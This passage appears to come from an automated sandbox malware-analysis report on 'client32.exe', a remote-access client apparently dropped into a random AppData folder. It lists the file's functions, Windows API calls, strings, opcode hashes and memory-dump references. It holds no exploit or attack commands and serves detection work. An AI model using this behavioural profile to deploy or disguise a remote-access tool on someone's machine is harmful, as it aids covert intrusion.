                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorFileLastModuleNameProc
                                                                                  • String ID: GetModuleFileNameExA
                                                                                  • API String ID: 4084229558-758377266
                                                                                  • Opcode ID: cb4cb57ac6399fed4f61dfc6aa5f1ce79bcd296d8ab00f45f3cb76847ee55938
                                                                                  • Instruction ID: 0d13824d730ba6c122bcd60d6c49a8bab978e1b28e8b80ff1226ce7be9fb36c7
                                                                                  • Opcode Fuzzy Hash: cb4cb57ac6399fed4f61dfc6aa5f1ce79bcd296d8ab00f45f3cb76847ee55938
                                                                                  • Instruction Fuzzy Hash: 40F05E72605718AFC720CF98E844A9777ACEB49760F00851AF949D7240C671F8118BA1
                                                                                  Function 11138740 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
                                                                                  • CloseHandle.KERNEL32(00000000,?,111396D2,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11138785
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateHandleThread__wcstoi64
                                                                                  • String ID: *AutoICFConfig$Client
                                                                                  • API String ID: 3257255551-59951473
                                                                                  • Opcode ID: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                                  • Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
                                                                                  • Opcode Fuzzy Hash: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                                  • Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755
                                                                                  Function 11070F90 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeaveSleep
                                                                                  • String ID: Push
                                                                                  • API String ID: 1566154052-4278761818
                                                                                  • Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                  • Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
                                                                                  • Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                                  • Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90
                                                                                  Function 6F9FA4E0 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(6FA3B898,00000000,?,?,?,6F9FDA7F,?,00000000), ref: 6F9FA503
                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 6F9FA568
                                                                                  • Sleep.KERNEL32(00000000,?,6F9FDA7F,?,00000000), ref: 6F9FA581
                                                                                  • LeaveCriticalSection.KERNEL32(6FA3B898,00000000), ref: 6F9FA5B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                  • String ID:
                                                                                  • API String ID: 4212191310-0
                                                                                  • Opcode ID: 3847d9900a745e4f39cd2688ba349dd3868292f9b323f1b1f1cab5b40c4a7616
                                                                                  • Instruction ID: 6a2e79e1d5a883b727aebf1398ce68fba7fbcf7726b59de46cb6db3ed4a93a8d
                                                                                  • Opcode Fuzzy Hash: 3847d9900a745e4f39cd2688ba349dd3868292f9b323f1b1f1cab5b40c4a7616
                                                                                  • Instruction Fuzzy Hash: 3521AFB3D01B109FDB218E18DC41A9AB7BDAF83324F019527D856D7280D376F8928B92
                                                                                  Function 003A1020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCommandLineA.KERNEL32 ref: 003A1027
                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 003A107B
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 003A1096
                                                                                  • ExitProcess.KERNEL32 ref: 003A10A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3445791821.00000000003A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 003A0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3445765372.00000000003A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_3a0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                  • String ID:
                                                                                  • API String ID: 2164999147-0
                                                                                  • Opcode ID: fd669330d4b64a2c5165a0324d133a4a1ef91ddd6727b66bfa34bfe6acae9b04
                                                                                  • Instruction ID: 5d456e764b321d6668c6d9fa79d6dd8a6fda9bbbb3e3d70f1eb09e189401c3ca
                                                                                  • Opcode Fuzzy Hash: fd669330d4b64a2c5165a0324d133a4a1ef91ddd6727b66bfa34bfe6acae9b04
                                                                                  • Instruction Fuzzy Hash: 3E11D2644083C45AEB33DF6488487FBBFA9DF13390F264048ECD69714AD25648C7C7A5
                                                                                  Function 11030DA7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                  • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 1314093303-0
                                                                                  • Opcode ID: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                  • Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
                                                                                  • Opcode Fuzzy Hash: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                  • Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40
                                                                                  Function 11145990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111459F6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                  • String ID: :
                                                                                  • API String ID: 2034136378-336475711
                                                                                  • Opcode ID: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
                                                                                  • Instruction ID: 2f025fe159ad018ca32f107a988c6b97e10c7b7f69d8ea9c63f353a653f43b24
                                                                                  • Opcode Fuzzy Hash: 1879a18607367a7fe0ec9fcc5ca715ca320c192212d283e296261fc87c6dfa09
                                                                                  • Instruction Fuzzy Hash: 65213738C043599FDB21CF64CC44FD9BB68AF16708F6041D4D59967942EF706A8DCBA1
                                                                                  Function 111447F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, xrefs: 11144804, 11144812
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CurrentFileModuleNameProcess
                                                                                  • String ID: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                                                                  • API String ID: 2251294070-482702774
                                                                                  • Opcode ID: 751681083fa28ab0273cb23fb616810117bb1d4aec001fef4099e21270a1e4b8
                                                                                  • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                                  • Opcode Fuzzy Hash: 751681083fa28ab0273cb23fb616810117bb1d4aec001fef4099e21270a1e4b8
                                                                                  • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                                  Function 110D0960 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __strdup
                                                                                  • String ID: *this==pszSrc$..\CTL32\NSMString.cpp
                                                                                  • API String ID: 838363481-1175285396
                                                                                  • Opcode ID: 7244959e6880bffd10a273b22dd5c93d76c3f537a87f38f753278ccf60d995ca
                                                                                  • Instruction ID: 29c62dc5338ff495c898086ff50a52fd619e2258fc3847dfd771a07a915be9b0
                                                                                  • Opcode Fuzzy Hash: 7244959e6880bffd10a273b22dd5c93d76c3f537a87f38f753278ccf60d995ca
                                                                                  • Instruction Fuzzy Hash: 95F028B5E003525BEA00DE6AB804A9BFBD89FC2298F44847AE8DDE7311E570B405C6D4
                                                                                  Function 11110230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 11110239
                                                                                    • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                    • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                    • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                  • _memset.LIBCMT ref: 11110262
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                  • String ID: ..\ctl32\Refcount.cpp
                                                                                  • API String ID: 2803934178-2363596943
                                                                                  • Opcode ID: 682feaadb0c8680301ec8f4634659c3c3f42cf446e565166f1417036573033b6
                                                                                  • Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
                                                                                  • Opcode Fuzzy Hash: 682feaadb0c8680301ec8f4634659c3c3f42cf446e565166f1417036573033b6
                                                                                  • Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6
                                                                                  Function 11015580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102F66A,MiniDumpType,000000FF,00000000,00000000), ref: 11015597
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,View,Client,Bridge), ref: 110155A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFileHandle
                                                                                  • String ID: \\.\NSWFPDrv
                                                                                  • API String ID: 3498533004-85019792
                                                                                  • Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                  • Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
                                                                                  • Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                  • Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
                                                                                  Function 1115CCA0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
